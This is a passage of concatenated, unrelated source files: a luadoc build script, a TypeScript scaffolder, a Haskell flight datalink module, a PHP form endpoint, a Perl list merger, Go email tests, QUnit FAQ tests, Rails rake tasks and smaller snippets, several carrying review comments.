L<http://snowball.tartarus.org>, L<Lingua::Stem::Snowball|Lingua::Stem::Snowball>, L<Lingua::Stem|Lingua::Stem>.
=cut
|
#!/bin/bash

# Regenerate the luadoc API documentation for the hs/ Lua sources.

# Run from the directory containing this script, regardless of CWD.
# FIX: the original unquoted `cd \`dirname $0\`` breaks on paths with
# spaces and ignored cd failures.
cd "$(dirname "$0")" || exit 1

# Start from a clean output tree so stale pages do not linger.
rm -rf doc/*
luadoc -d doc hs/*.lua hs/*/*.lua
|
import { logger } from '../utils/logger';
import { mkdir, touch } from '../utils/fs';
import { npmInit } from '../actions/npm';
import { addScript, setPackageJsonValue } from '../actions/packageJson';
/**
 * Scaffold a bare TypeScript project layout in the current directory:
 * creates src/, test/ and dist/ folders, touches the entry file, runs
 * `npm init`, points package.json "main" at the compiled entry point
 * and registers a "start" script.
 *
 * @param entryfile path of the entry source file to create
 */
export const createEmptyProject = async (entryfile = 'src/index.ts') => {
  await mkdir('src');
  await mkdir('test');
  await mkdir('dist');
  await touch(entryfile);

  logger.context('NPM');
  logger.pending('init');
  await npmInit();

  logger.pending('creating config');
  // Compiled output is expected under dist/, mirroring the src/ layout.
  await setPackageJsonValue('main', 'dist/src/index.js');
  await addScript('start', 'node .');

  logger.success();
};
|
{-# LANGUAGE RankNTypes #-}
{-# LANGUAGE DataKinds #-}
{-# LANGUAGE ScopedTypeVariables #-}
{-# LANGUAGE TypeFamilies #-}
{-# OPTIONS_GHC -fno-warn-orphans #-}
module SMACCMPilot.Flight.Datalink
( datalink ) where
import GHC.TypeLits
import Data.Char (ord)
import Ivory.Language
import Ivory.Tower
import qualified Ivory.HXStream as H
import qualified SMACCMPilot.Flight.Datalink.AirData as A
import qualified SMACCMPilot.Flight.Datalink.RadioData as R
import qualified SMACCMPilot.Communications as C
--------------------------------------------------------------------------------
-- | Build the datalink tower task: wires hxstream framing between the
-- raw UART byte channels and the commsec encrypt/decrypt channels.
datalink :: (SingI n0, SingI n1, SingI n2, SingI n3)
         => String
         -> ChannelSink n0 (Stored Uint8)     -- from UART
         -> ChannelSource n1 (Stored Uint8)   -- to UART
         -> Tower p ( ChannelSink 8 C.CommsecArray    -- to decrypter
                    , ChannelSource 8 C.CommsecArray  -- from encrypter to Hx
                    , ChannelSink n2 (Struct "radio_stat")
                      -- XXX no endpoint currently
                    , ChannelSink n3 (Struct "radio_info"))
datalink name istream ostream = do
  framed_i <- channelWithSize
  framed_o <- channelWithSize
  stat_o   <- channelWithSize
  info_o   <- channelWithSize
  -- One task runs both directions of the link.
  task ("datalink_" ++ name) $ do
    decoder istream (src framed_o) (src stat_o) (src info_o)
    encoder (snk framed_i) ostream
    taskModuleDef $ depend H.hxstreamModule
  return (snk framed_o, src framed_i, snk stat_o, snk info_o)
--------------------------------------------------------------------------------
-- | Handle either airdata or radiodata messages from the UART on link_sink.
-- De-hxstream and send on the appropriate channel (to SMACCMPilot or radio data
-- channels).
decoder :: (SingI n0, SingI n1, SingI n2, SingI n3)
=> ChannelSink n0 (Stored Uint8) -- from UART
-> ChannelSource n1 C.CommsecArray -- to Commsec
-> ChannelSource n2 (Struct "radio_stat") -- XXX no endpoint
-> ChannelSource n3 (Struct "radio_info") -- XXX no endpoint
-> Task p ()
decoder link_sink framed_src stat_src info_src = do
link_istream <- withChannelEvent link_sink "link_istream"
framed_ostream <- withChannelEmitter framed_src "framed_ostream"
stat_ostream <- withChannelEmitter stat_src "stat_ostream"
info_ostream <- withChannelEmitter info_src "info_ostream"
hx <- taskLocalInit "hx_decoder_state" H.initStreamState
airhandler <- A.airDataHandler framed_ostream
radiohandler <- R.radioDataHandler stat_ostream info_ostream
onEventV link_istream $ \v ->
noReturn $ H.decodes [airhandler, radiohandler] hx v
--------------------------------------------------------------------------------
-- | Encode airdata or generated radio data to give to either the UART task.
encoder :: (SingI n0, SingI n1)
        => ChannelSink n0 C.CommsecArray     -- from commsec
        -> ChannelSource n1 (Stored Uint8)   -- to UART
        -> Task p ()
encoder framed_snk link_src = do
  link_ostream   <- withChannelEmitter link_src   "link_ostream"
  framed_istream <- withChannelEvent   framed_snk "framed_istream"
  -- Send air data as quickly as we get it
  onEvent framed_istream $ \frame -> noReturn $
    H.encode C.airDataTag frame (emitV_ link_ostream)
  -- Periodically send binary info request to radio
  -- (a two-byte "B\r" frame, once every 1000 ms).
  onPeriod 1000 $ \_t -> noReturn $ do
    (frame :: Ref (Stack s) (Array 2 (Stored Uint8))) <- local $ iarray
      [ ival (charUint8 'B')
      , ival (charUint8 '\r')
      ]
    H.encode C.radioDataTag (constRef frame) (emitV_ link_ostream)
  where
  -- Narrow a Char to its byte value for frame construction.
  charUint8 :: Char -> Uint8
  charUint8 = fromIntegral . ord
--------------------------------------------------------------------------------
|
<?php
// CORS preamble: the form is served from the local React dev server.
header('Access-Control-Allow-Origin: http://localhost:3000');
header('Access-Control-Allow-Headers: Content-Type, x-requested-with');
header('Content-Type: text/plain; charset=utf-8');

// Preflight requests carry no payload; acknowledge and stop.
if ($_SERVER['REQUEST_METHOD'] === "OPTIONS") {
    die();
}

try {
    $input = file_get_contents('php://input');
    $data = json_decode($input, true);

    // Reject the submission unless every expected field is present and
    // truthy (same contract as before: '' and '0' are rejected too).
    if (!$data
        || !isset($data['date']) || !isset($data['heure'])
        || !isset($data['lat']) || !isset($data['lon'])
        || !isset($data['firstname']) || !isset($data['name']) || !isset($data['email'])
        || !$data['date'] || !$data['heure']
        || !$data['lat'] || !$data['lon']
        || !$data['firstname'] || !$data['name'] || !$data['email']) {
        throw new \Exception('Missing parameters');
    }

    $filename = __DIR__.'/upload/data';

    // FIX: LOCK_EX guards against interleaved appends from concurrent
    // requests; the original unlocked append could corrupt lines.
    file_put_contents($filename, $input."\n", FILE_APPEND | LOCK_EX);

    // Respond with the number of submissions recorded so far
    // (count of non-empty lines in the data file).
    $count = 0;
    $fp = fopen($filename, 'r');
    if ($fp) {
        while (($line = fgets($fp)) !== false) {
            if ($line) {
                $count++;
            }
        }
        // FIX: fclose() only when fopen() succeeded; the original
        // called it unconditionally and warned on failure.
        fclose($fp);
    }
    echo $count;
} catch (\Exception $e) {
    header("HTTP/1.0 500 Internal Server Error");
    echo $e->getMessage();
}
|
#!/usr/bin/perl
eval 'exec /usr/bin/perl -S $0 ${1+"$@"}'
if 0; # not running under some shell
=head1 NAME
merge_lists.pl - Iterate through a directory of lists and merge them into a single list.
=head1 SYNOPSIS
USAGE: merge_lists.pl
--input_dir=/some/dir/
--output_list=/some/path/something.list
[ --glob='*.list' ]
=head1 OPTIONS
B<--input_dir,-i>
The input directory containing the list files.
B<--output_list,-o>
The file to which the output list will be written.
B<--glob,-g>
Searches for file names with this pattern within --input_dir
B<--debug,-d>
Debug level. Use a large number to turn on verbose debugging.
B<--log,-l>
Log file
B<--help,-h>
This help message
=head1 DESCRIPTION
Because distributed processes cannot all write to the same list file, each write their
own and we use this script to merge them into a single file, after the iteration steps
are finished. Of course, this can also be used outside of workflow if you simply have
files that you want to merge.
Why not use just cat with a redirector? We could, but this allows us to log each file
as it is merged into the final version as well as do any needed sanity checking.
=head1 INPUT
The required input is simply a directory path, specified by --input_dir, containing the files
you want to merge. This will merge every file in the directory into the output
file unless you also pass a filter with the --glob option. Glob allows one to specify
many of the same patterns for file identification as using grep on the command line, such
as * ? [ ] .
=head1 OUTPUT
Each of the files will be concatenated, with no content modification, onto the end of the
output file, specified with the --output_list option. If the output file already exists
it will be overwritten.
=head1 CONTACT
Joshua Orvis
jorvis@tigr.org
=cut
use strict;
use Getopt::Long qw(:config no_ignore_case no_auto_abbrev pass_through);
use Pod::Usage;
BEGIN {
use Ergatis::Logger;
}
my %options = ();
my $results = GetOptions (\%options,
                          'input_dir|i=s',
                          'glob|g=s',
                          'output_list|o=s',
                          'log|l=s',
                          'debug|d=s',
                          'help|h') || pod2usage();

my $logfile = $options{'log'} || Ergatis::Logger::get_default_logfilename();
my $logger = new Ergatis::Logger('LOG_FILE'=>$logfile,
                                 'LOG_LEVEL'=>$options{'debug'});
$logger = $logger->get_logger();

## display documentation
if( $options{'help'} ){
    pod2usage( {-exitval => 0, -verbose => 2, -output => \*STDERR} );
}

## make sure everything passed was peachy
&check_parameters(\%options);

## open the output file (overwrites any existing file, per the POD)
my $outputfn = $options{output_list};
open(my $ofh, ">$outputfn") || $logger->logdie("can't create output file $outputfn");

## merge each file.
use File::Find;
find sub {
    my $file = $File::Find::name;

    # NOTE(review): --glob is documented as a shell-style glob but is
    # applied here as a regular expression; a pattern like '*.list' is
    # not a valid regex -- confirm the intended matching semantics.
    if($file =~ /$options{glob}/){
        $logger->info("merging $file into $outputfn") if ($logger->is_info);

        ## open this file, and write it to the output file
        open(my $ifh, "<$file") || $logger->logdie("can't read input file $file");
        while (<$ifh>) { print $ofh $_ }
    }
}, "$options{input_dir}";

exit;
# Validate command-line options and apply defaults.  Takes a hashref
# (FIX: the original read the global %options hash via $options{...},
# silently ignoring the reference it was passed).
sub check_parameters {
    my $options = shift;

    ## input_dir and output_list are required
    unless (defined $options->{input_dir} && defined $options->{output_list}) {
        # FIX: replaced the "error message" placeholder with a real message.
        pod2usage({-exitval => 2, -message => "--input_dir and --output_list are required", -verbose => 1, -output => \*STDERR});
    }

    ## make sure input_dir exists
    if (! -e $options->{input_dir}) {
        $logger->logdie("the input dir passed ($options->{input_dir}) cannot be read or does not exist");
    }

    ## handle default glob: match every file.
    ## FIX: the previous default of '*' is applied as a regex later and a
    ## bare '*' dies with "quantifier follows nothing"; an empty pattern
    ## matches everything, which is what the '*' glob intended.
    if (! defined $options->{glob}) { $options->{glob} = '' }
}
|
/**
 * Salary record for an agent at a point in time.
 */
export class AgentSalary {
  // Effective date of this salary entry.
  public Date: Date;
  // Salary amount; units/currency not specified here — confirm with the API.
  public Salary: number;
}
|
// Component that lets the user pick a predefined preferences profile.
angular.module('app.components')
  .component('profileSelector', {
    templateUrl: 'app/components/profileSelector.html',
    controller: ProfileSelectorCtrl,
    controllerAs: 'profileSelector',
    bindings: {
      // Two-way bound flag, flipped whenever a profile is selected.
      mode: '='
    }
  });

function ProfileSelectorCtrl (constants, preferencesProvider) {
  var vm = this;

  vm.selectedProfile = null;
  vm.toggleMode = toggleMode;
  vm.preferences = preferencesProvider.preferences;
  vm.profiles = constants.profiles;

  // Apply the chosen profile's preferences, remember the selection and
  // flip the bound mode flag.
  // FIX: removed a leftover debugging console.log of the preferences.
  vm.selectProfile = function (id) {
    preferencesProvider.preferences = constants.profiles[id].preferences;
    vm.selectedProfile = constants.profiles[id];
    vm.toggleMode();
  };

  function toggleMode() {
    vm.mode = !vm.mode;
  }
  // FIX: dropped the ineffective `return vm;` — Angular instantiates
  // controllers with `new`, and vm is already `this`.
}
|
package passwordless
import (
"io/ioutil"
"mime/multipart"
"net/mail"
"regexp"
"testing"
"time"
"github.com/stretchr/testify/assert"
)
// TestEmail exercises Email header generation plus plain-text and
// multipart (text + HTML) body encoding.
func TestEmail(t *testing.T) {
	d := time.Date(2001, 2, 3, 4, 5, 6, 0, time.UTC)
	e := Email{
		To:      "bender@ilovebender.com",
		Subject: "Mom Calling",
		Date:    d,
	}

	// Empty body
	m, err := mail.ReadMessage(e.Buffer())
	assert.NoError(t, err)
	assert.Equal(t, "bender@ilovebender.com", m.Header.Get("To"))
	assert.Equal(t, "Mom Calling", m.Header.Get("Subject"))
	assert.Equal(t, d.Format(time.RFC822), m.Header.Get("Date"))

	// Plain body
	e.AddBody("", "Hello dear")
	m, err = mail.ReadMessage(e.Buffer())
	assert.NoError(t, err)
	assert.Equal(t, "text/plain; charset=\"UTF-8\";", m.Header.Get("Content-Type"))
	body, err := ioutil.ReadAll(m.Body)
	assert.NoError(t, err)
	assert.Equal(t, "Hello dear\r\n", string(body))

	// Additional HTML body (multipart)
	e.AddBody("text/html", "<html><body>Hello dear</body></html>")
	m, err = mail.ReadMessage(e.Buffer())
	// FIX: this error was previously unchecked before m was used.
	assert.NoError(t, err)
	assert.Equal(t, "1.0", m.Header.Get("MIME-Version"))
	ct := m.Header.Get("Content-Type")
	re := regexp.MustCompile("^multipart/alternative; boundary=([a-z0-9]+)$")
	assert.Regexp(t, re, ct)
	boundary := re.FindStringSubmatch(ct)[1]
	assert.NotEmpty(t, boundary)
	mpr := multipart.NewReader(m.Body, boundary)

	// Read first part
	p, err := mpr.NextPart()
	assert.NoError(t, err, "reading first part")
	assert.Equal(t, "text/plain; charset=\"UTF-8\";", p.Header.Get("Content-Type"))
	body, err = ioutil.ReadAll(p)
	assert.NoError(t, err, "reading body of first part")
	assert.Equal(t, "Hello dear", string(body))

	// Read second part
	p, err = mpr.NextPart()
	assert.NoError(t, err, "reading second part")
	assert.Equal(t, "text/html; charset=\"UTF-8\";", p.Header.Get("Content-Type"))
	body, err = ioutil.ReadAll(p)
	assert.NoError(t, err, "reading body of second part")
	assert.Equal(t, "<html><body>Hello dear</body></html>", string(body))

	// Read (non-existent) next part.
	// FIX: also assert the error — NextPart reports io.EOF (non-nil)
	// once all parts have been consumed.
	p, err = mpr.NextPart()
	assert.Error(t, err, "expected EOF after final part")
	assert.Nil(t, p)
}
|
import {always} from "common-fns";
import {Source} from "../../types";
import {map} from "./map";
import {pipe} from "../utils/pipe";
/**
 * mapTo
 * --------------
 *
 * Replaces every value emitted by the stream with the provided
 * constant value.
 *
 */
export const mapTo = <T>(value: T) => (source$: Source<any>) => {
  const emitConstant = map(always(value));
  return pipe(source$, emitConstant);
};
|
<?php
namespace App\Model\Employee;

use Illuminate\Database\Eloquent\Model;
use Spatie\Activitylog\Traits\LogsActivity;

/**
 * Eloquent model for a single employee attendance record
 * (table `employee_attendances`), with Spatie activity logging.
 */
class Attendance extends Model {
    use LogsActivity;

    // Mass-assignable columns.
    protected $fillable = ['employee_id', 'employee_attendance_type_id', 'date_of_attendance', 'remarks', 'options',
    ];
    protected $primaryKey = 'id';
    protected $table = 'employee_attendances';

    // Activity-log configuration: log fillable fields, only when they
    // actually change, ignoring bare `updated_at` touches.
    protected static $logName = 'employee_attendance';
    protected static $logFillable = true;
    protected static $logOnlyDirty = true;
    protected static $ignoreChangedAttributes = ['updated_at'];

    // NOTE(review): this file lives in App\Model\Employee (singular)
    // but both relations reference App\Models\... (plural) — confirm
    // which namespace actually exists; one of the two looks wrong.
    public function employee() {
        return $this->belongsTo('App\Models\Employee\Employee');
    }

    public function attendanceType() {
        return $this->belongsTo('App\Models\Configuration\Employee\AttendanceType', 'employee_attendance_type_id');
    }
}
|
# Ruby to JavaScript regular expression converter
class JSRegexp
  class << self
    # Convert a Ruby Regexp to JavaScript RegExp format.
    #
    # Strips the surrounding slashes and trailing flags, rewrites the
    # Ruby-only anchors (\A, \G to ^; \Z, \z to $) and removes
    # constructs JavaScript does not support (inline comments,
    # option-disabling groups, \R, \a, \e).
    #
    # NOTE(review): the final gsub(/\s/, '') removes ALL whitespace,
    # which is only safe for /x (extended) patterns — a literal space
    # in a non-extended pattern is silently dropped; confirm intended.
    #
    # @param regexp [Regexp, String] a Ruby regular expression
    # @return [String] JavaScript regular expression represented as a string
    def convert(regexp)
      stringify(regexp)
        .sub(/^\//, '')
        .sub(/\/[a-z]*$/, '')
        .sub('\\A', '^')
        .sub('\\G', '^')
        .sub('\\Z', '$')
        .sub('\\z', '$')
        .gsub('\\R', '')
        .gsub('\\a', '')
        .gsub('\\e', '')
        .gsub(/\(\?#.+\)/, '')
        .gsub(/\(\?-\w+:/, '(')
        .gsub(/\s/, '')
    end

    private

    # Render a Regexp via #inspect (preserves escaping and delimiters);
    # pass strings through unchanged.
    def stringify(regexp) # :nodoc:
      regexp.is_a?(Regexp) ? regexp.inspect : regexp.to_s
    end
  end
end
|
-- Replace the GUID-based uniqueness scheme: drop the guid column and its
-- constraint, and enforce uniqueness on (channel_id, enclosure_url) instead.
ALTER TABLE podcasts DROP CONSTRAINT unique_guids;
ALTER TABLE podcasts DROP COLUMN guid;
ALTER TABLE podcasts ADD CONSTRAINT unique_podcast_columns UNIQUE(channel_id, enclosure_url);
|
# frozen_string_literal: true

module BoltSpec
  # RSpec helper mixin for specs asserting on Bolt node errors.
  module Errors
    # Expect the given block to raise an error of class `klass` whose
    # issue_code equals `issue_code` and whose message matches `message`.
    def expect_node_error(klass, issue_code, message)
      expect {
        yield
      }.to(raise_error { |ex|
        expect(ex).to be_a(klass)
        expect(ex.issue_code).to eq(issue_code)
        expect(ex.message).to match(message)
      })
    end
  end
end
|
---
company-name: Tapvalue
domain: tapvalue.com
home: http://www.tapvalue.com/Home
privacy-policy: http://www.tapvalue.com/fr/mentions-l%C3%A9gales
---
|
'use strict';
var assert = require('chai').assert;
var StateSet = require('osg/StateSet');
var Uniform = require('osg/Uniform');
var Shader = require('osg/Shader');
var Program = require('osg/Program');
var Texture = require('osg/Texture');
// Unit tests for StateSet: uniform accessors, texture attributes and
// (program) attribute add/remove behaviour.
module.exports = function() {
    test('StateSet', function() {
        // Uniform accessors: undefined until added, defined afterwards.
        (function() {
            var stateset = new StateSet();
            var uniform;
            uniform = stateset.getUniform('test');
            assert.isOk(uniform === undefined, 'Check getting an non existant uniform');
            stateset.addUniform(Uniform.createFloat1(1.0, 'test'));
            uniform = stateset.getUniform('test');
            assert.isOk(uniform !== undefined, 'Check getting an existant uniform');
        })();

        // Texture attribute set/get/remove on texture unit 1.
        (function() {
            var ss = new StateSet();
            var t = new Texture();
            ss.setTextureAttributeAndModes(1, t);
            assert.isOk(
                ss.getTextureAttribute(1, 'Texture') === t,
                'Check texture attribute accessors'
            );
            ss.removeTextureAttribute(1, 'Texture');
            assert.isOk(
                ss.getTextureAttribute(1, 'Texture') === undefined,
                'Check texture attribute has been removed'
            );
        })();

        // Program attribute set/get/remove.
        (function() {
            var ss = new StateSet();

            // Build a minimal shader program fixture.
            function getShader() {
                var vertexshader = [
                    '',
                    'attribute vec3 Vertex;',
                    'varying vec4 position;',
                    'void main(void) {',
                    '  gl_Position = vec4(Vertex,1.0);',
                    '}'
                ].join('\n');

                var fragmentshader = [
                    '',
                    'precision highp float;',
                    'varying vec4 position;',
                    'void main(void) {',
                    '  gl_FragColor = vec4(1.0, 0.0, 0.0, 1.0);',
                    '}',
                    ''
                ].join('\n');

                var program = new Program(
                    new Shader('VERTEX_SHADER', vertexshader),
                    new Shader('FRAGMENT_SHADER', fragmentshader)
                );

                program.trackAttributes = {};
                program.trackAttributes.attributeKeys = [];
                return program;
            }

            var s = getShader();
            ss.setAttributeAndModes(s);
            assert.isOk(ss.getAttribute('Program') === s, 'Check stateset program');
            ss.removeAttribute('Program');
            assert.isOk(ss.getAttribute('Program') === undefined, 'Check program has been removed');
        })();
    });
};
|
module Docs
class Rails
class EntriesFilter < Docs::Rdoc::EntriesFilter
TYPE_BY_NAME_MATCHES = {
/Assertions|::Test|Fixture/ => 'Testing',
/\AActiveRecord.+mysql/i => 'ActiveRecord/MySQL',
/\AActiveRecord.+postgresql/i => 'ActiveRecord/PostgreSQL',
/\AActiveRecord.+sqlite/i => 'ActiveRecord/SQLite',
/\AActiveRecord.+Assoc/ => 'ActiveRecord/Associations',
/\AActiveRecord.+Attribute/ => 'ActiveRecord/Attributes',
/\AActiveRecord.+ConnectionAdapters/ => 'ActiveRecord/Connection',
/\AActiveSupport.+(Subscriber|Notifications)/ => 'ActiveSupport/Instrumentation',
/\A(False|Nil|True)Class/ => 'Boolean' }
TYPE_BY_NAME_STARTS_WITH = {
'ActionDispatch::Integration' => 'Testing',
'ActionDispatch::Request' => 'ActionDispatch/Request',
'ActionDispatch::Response' => 'ActionDispatch/Response',
'ActionDispatch::Routing' => 'ActionDispatch/Routing',
'ActionView::Helpers' => 'ActionView/Helpers',
'ActiveModel::Errors' => 'ActiveModel/Validation',
'ActiveModel::Valid' => 'ActiveModel/Validation',
'ActiveRecord::Batches' => 'ActiveModel/Query',
'ActiveRecord::Calculations' => 'ActiveModel/Query',
'ActiveRecord::Connection' => 'ActiveModel/Connection',
'ActiveRecord::FinderMethods' => 'ActiveModel/Query',
'ActiveRecord::Query' => 'ActiveModel/Query',
'ActiveRecord::Relation' => 'ActiveModel/Relation',
'ActiveRecord::Result' => 'ActiveModel/Connection',
'ActiveRecord::Scoping' => 'ActiveModel/Query',
'ActiveRecord::SpawnMethods' => 'ActiveModel/Query',
'ActiveSupport::Cach' => 'ActiveSupport/Caching',
'ActiveSupport::Inflector' => 'ActiveSupport/Inflector',
'ActiveSupport::Time' => 'ActiveSupport/TimeZones',
'Rails::Application' => 'Rails/Application',
'Rails::Engine' => 'Rails/Engine',
'Rails::Railtie' => 'Rails/Railtie' }
def get_type
parent = at_css('.meta-parent').try(:content).to_s
if [name, parent].any? { |str| str.end_with?('Error') || str.end_with?('Exception') }
return 'Errors'
end
TYPE_BY_NAME_MATCHES.each_pair do |key, value|
return value if name =~ key
end
TYPE_BY_NAME_STARTS_WITH.each_pair do |key, value|
return value if name.start_with?(key)
end
super
end
def include_default_entry?
super && !skip?
end
def additional_entries
skip? ? [] : super
end
def skip?
@skip ||= !css('p').any? { |node| node.content.present? }
end
end
end
end
|
module("Faq", {
  'setup': function() {
    BMTestUtils.FaqPre = BMTestUtils.getAllElements();

    // Override Env.getParameterByName to get verification parameters
    BMTestUtils.overrideGetParameterByName();

    // Create the faq_page div so functions have something to modify
    if (document.getElementById('faq_page') == null) {
      $('body').append($('<div>', {'id': 'env_message', }));
      $('body').append($('<div>', {'id': 'faq_page', }));
    }
  },
  'teardown': function(assert) {

    // Do not ignore intermittent failures in this test --- you
    // risk breaking the entire suite in hard-to-debug ways
    assert.equal(jQuery.active, 0,
      "All test functions MUST complete jQuery activity before exiting");

    // Delete all elements we expect this module to create

    // JS objects
    delete Faq.page;

    // Page elements
    $('#faq_page').remove();

    BMTestUtils.deleteEnvMessage();
    // BUG FIX: restoreGetParameterByName() was previously called twice here;
    // one call is enough to undo the override installed in setup.
    BMTestUtils.restoreGetParameterByName();

    // Fail if any other elements were added or removed
    BMTestUtils.FaqPost = BMTestUtils.getAllElements();
    assert.deepEqual(
      BMTestUtils.FaqPost, BMTestUtils.FaqPre,
      "After testing, the page should have no unexpected element changes");
  }
});
// pre-flight test of whether the Faq module has been loaded
test("test_Faq_is_loaded", function(assert) {
  assert.ok(Faq, "The Faq namespace exists");
});

// Page-rendering entry points: each must leave #faq_page as a div.
test("test_Faq.showLoggedInPage", function(assert) {
  BMTestUtils.setupFakeLogin();
  Faq.showLoggedInPage();
  var node = document.getElementById('faq_page');
  assert.equal(node.nodeName, "DIV",
    "#faq_page is a div after showLoggedInPage() is called");
  BMTestUtils.cleanupFakeLogin();
});
test("test_Faq.showLoggedOutPage", function(assert) {
  Faq.showLoggedOutPage();
  var node = document.getElementById('faq_page');
  assert.equal(node.nodeName, "DIV",
    "#faq_page is a div after showLoggedOutPage() is called");
});
test("test_Faq.showPage", function(assert) {
  Faq.showPage();
  var node = document.getElementById('faq_page');
  assert.equal(node.nodeName, "DIV",
    "#faq_page is a div after showPage() is called");
});

// Fragment builders: each returns a jQuery-wrapped div.
test("test_Faq.bodyText", function(assert) {
  var node = Faq.bodyText();
  assert.equal(node[0].nodeName, "DIV", "bodyText returns a div");
});
test("test_Faq.generalInfo", function(assert) {
  var node = Faq.generalInfo();
  assert.equal(node[0].nodeName, "DIV", "generalInfo returns a div");
});
// BUG FIX: this test previously exercised Faq.generalInfo() (copy-paste
// error); it now calls Faq.tableOfContents() as its name promises.
test("test_Faq.tableOfContents", function(assert) {
  var node = Faq.tableOfContents();
  assert.equal(node[0].nodeName, "DIV", "tableOfContents returns a DIV");
  assert.equal(node[0].childNodes[0].nodeName, "H1", "toc start with an H1");
  assert.equal(node[0].childNodes[1].nodeName, "UL", "toc contain a UL");
});
// Table-of-contents link builders: each section returns an <li> holding an
// anchor followed by a nested list of links.
test("test_Faq.gameplayLinks", function(assert) {
  var node = Faq.gameplayLinks();
  assert.equal(node[0].nodeName, "LI", "gameplayLinks returns a LI");
  assert.equal(node[0].childNodes[0].nodeName, "A", "links start with an A");
  assert.equal(node[0].childNodes[1].nodeName, "UL", "links contain a UL");
});
test("test_Faq.userprefsLinks", function(assert) {
  var node = Faq.userprefsLinks();
  assert.equal(node[0].nodeName, "LI", "userprefsLinks returns a LI");
  assert.equal(node[0].childNodes[0].nodeName, "A", "links start with an A");
  assert.equal(node[0].childNodes[1].nodeName, "UL", "links contain a UL");
});
test("test_Faq.forumLinks", function(assert) {
  var node = Faq.forumLinks();
  assert.equal(node[0].nodeName, "LI", "forumLinks returns a LI");
  assert.equal(node[0].childNodes[0].nodeName, "A", "links start with an A");
  assert.equal(node[0].childNodes[1].nodeName, "UL", "links contain a UL");
});
// The "unanswered" entry is a single link with no sub-list.
test("test_Faq.unansweredLink", function(assert) {
  var node = Faq.unansweredLink();
  assert.equal(node[0].nodeName, "LI", "link is a LI");
});
// Shared checker for the Faq.*Content helpers: every helper returns a
// document fragment; when headerTag is given, the fragment must start with
// an <a> anchor followed by a section header of that tag (H2 or H3).
// Consolidates twelve previously copy-pasted test bodies; assertion
// messages are unchanged.
function assertFaqContentFragment(assert, node, headerTag) {
  assert.equal(node[0].nodeName, "#document-fragment",
    "content contains a document fragment");
  if (headerTag) {
    assert.equal(node[0].childNodes[0].nodeName, "A", "content starts with an A");
    assert.equal(node[0].childNodes[1].nodeName, headerTag,
      "content contains a " + headerTag);
  }
}
test("test_Faq.content", function(assert) {
  assertFaqContentFragment(assert, Faq.content(), null);
});
test("test_Faq.gameplayContent", function(assert) {
  assertFaqContentFragment(assert, Faq.gameplayContent(), "H2");
});
test("test_Faq.defaultAttackContent", function(assert) {
  assertFaqContentFragment(assert, Faq.defaultAttackContent(), "H3");
});
test("test_Faq.buttonSpecialContent", function(assert) {
  assertFaqContentFragment(assert, Faq.buttonSpecialContent(), "H3");
});
test("test_Faq.flyingSquirrelContent", function(assert) {
  assertFaqContentFragment(assert, Faq.flyingSquirrelContent(), "H3");
});
test("test_Faq.japaneseBeetleContent", function(assert) {
  assertFaqContentFragment(assert, Faq.japaneseBeetleContent(), "H3");
});
test("test_Faq.userprefsContent", function(assert) {
  assertFaqContentFragment(assert, Faq.userprefsContent(), "H2");
});
test("test_Faq.monitorContent", function(assert) {
  assertFaqContentFragment(assert, Faq.monitorContent(), "H3");
});
test("test_Faq.fireOvershootingContent", function(assert) {
  assertFaqContentFragment(assert, Faq.fireOvershootingContent(), "H3");
});
test("test_Faq.forumContent", function(assert) {
  assertFaqContentFragment(assert, Faq.forumContent(), "H2");
});
test("test_Faq.forumLinkContent", function(assert) {
  assertFaqContentFragment(assert, Faq.forumLinkContent(), "H3");
});
test("test_Faq.unansweredContent", function(assert) {
  assertFaqContentFragment(assert, Faq.unansweredContent(), "H3");
});
|
# This code lets us redefine existing Rake tasks, which is extremely
# handy for modifying existing Rails rake tasks.
# Credit for the original snippet of code goes to Jeremy Kemper
# http://pastie.caboo.se/9620
unless Rake::TaskManager.methods.include?(:redefine_task)
  module Rake
    module TaskManager
      # Re-registers a task under its (namespace-scoped) name with a brand-new
      # task object, discarding any previously-defined actions and
      # prerequisites, then applies +deps+ and +block+ to the fresh task.
      def redefine_task(task_class, args, &block)
        task_name, deps = resolve_args([args])
        # Qualify the bare name with the current namespace scope.
        task_name = task_class.scope_name(@scope, task_name)
        deps = [deps] unless deps.respond_to?(:to_ary)
        deps = deps.collect {|d| d.to_s }
        # Overwriting the @tasks entry is what makes this a *redefinition*.
        task = @tasks[task_name.to_s] = task_class.new(task_name, self)
        task.application = self
        task.add_description(@last_description)
        @last_description = nil
        task.enhance(deps, &block)
        task
      end
    end
    class Task
      class << self
        # Convenience wrapper so callers can write Rake::Task.redefine_task.
        def redefine_task(args, &block)
          Rake.application.redefine_task(self, [args], &block)
        end
      end
    end
  end
end
namespace :db do
  namespace :migrate do
    desc 'Migrate database and plugins to current status.'
    task :all => [ 'db:migrate', 'db:migrate:plugins' ]

    desc 'Migrate plugins to current status.'
    # An optional version (task argument or VERSION env var) pins the target
    # schema version; nil migrates each plugin to its latest.
    task({:plugins => :environment}, :version) do |task, args|
      version = args[:version] || ENV['VERSION']
      Engines.plugins.each do |plugin|
        # Plugins without a migration directory have nothing to migrate.
        next unless File.exists? plugin.migration_directory
        puts "Migrating plugin #{plugin.name} ..."
        plugin.migrate(version ? version.to_i : nil)
      end
    end

    desc 'Migrate a specified plugin.'
    # NAME selects the plugin; VERSION optionally pins the target version.
    task({:plugin => :environment}, :name, :version) do |task, args|
      name = args[:name] || ENV['NAME']
      if plugin = Engines.plugins[name]
        version = args[:version] || ENV['VERSION']
        puts "Migrating #{plugin.name} to " + (version ? "version #{version}" : 'latest version') + " ..."
        plugin.migrate(version ? version.to_i : nil)
      else
        puts "Plugin #{name} does not exist."
      end
    end
  end
end
namespace :db do
  namespace :fixtures do
    namespace :plugins do
      desc "Load plugin fixtures into the current environment's database."
      # Loads test/fixtures/*.yml from every plugin, or from a single plugin
      # when the PLUGIN env var is set.
      task :load => :environment do
        require 'active_record/fixtures'
        ActiveRecord::Base.establish_connection(RAILS_ENV.to_sym)
        Dir.glob(File.join(RAILS_ROOT, 'vendor', 'plugins', ENV['PLUGIN'] || '**',
                 'test', 'fixtures', '*.yml')).each do |fixture_file|
          Fixtures.create_fixtures(File.dirname(fixture_file), File.basename(fixture_file, '.*'))
        end
      end
    end
  end
end
# this is just a modification of the original task in railties/lib/tasks/documentation.rake,
# because the default task doesn't support subdirectories like <plugin>/app or
# <plugin>/component. These tasks now include every file under a plugin's code paths (see
# Plugin#code_paths).
namespace :doc do
  plugins = FileList['vendor/plugins/**'].collect { |plugin| File.basename(plugin) }
  namespace :plugins do
    # Define doc tasks for each plugin
    plugins.each do |plugin|
      desc "Create plugin documentation for '#{plugin}'"
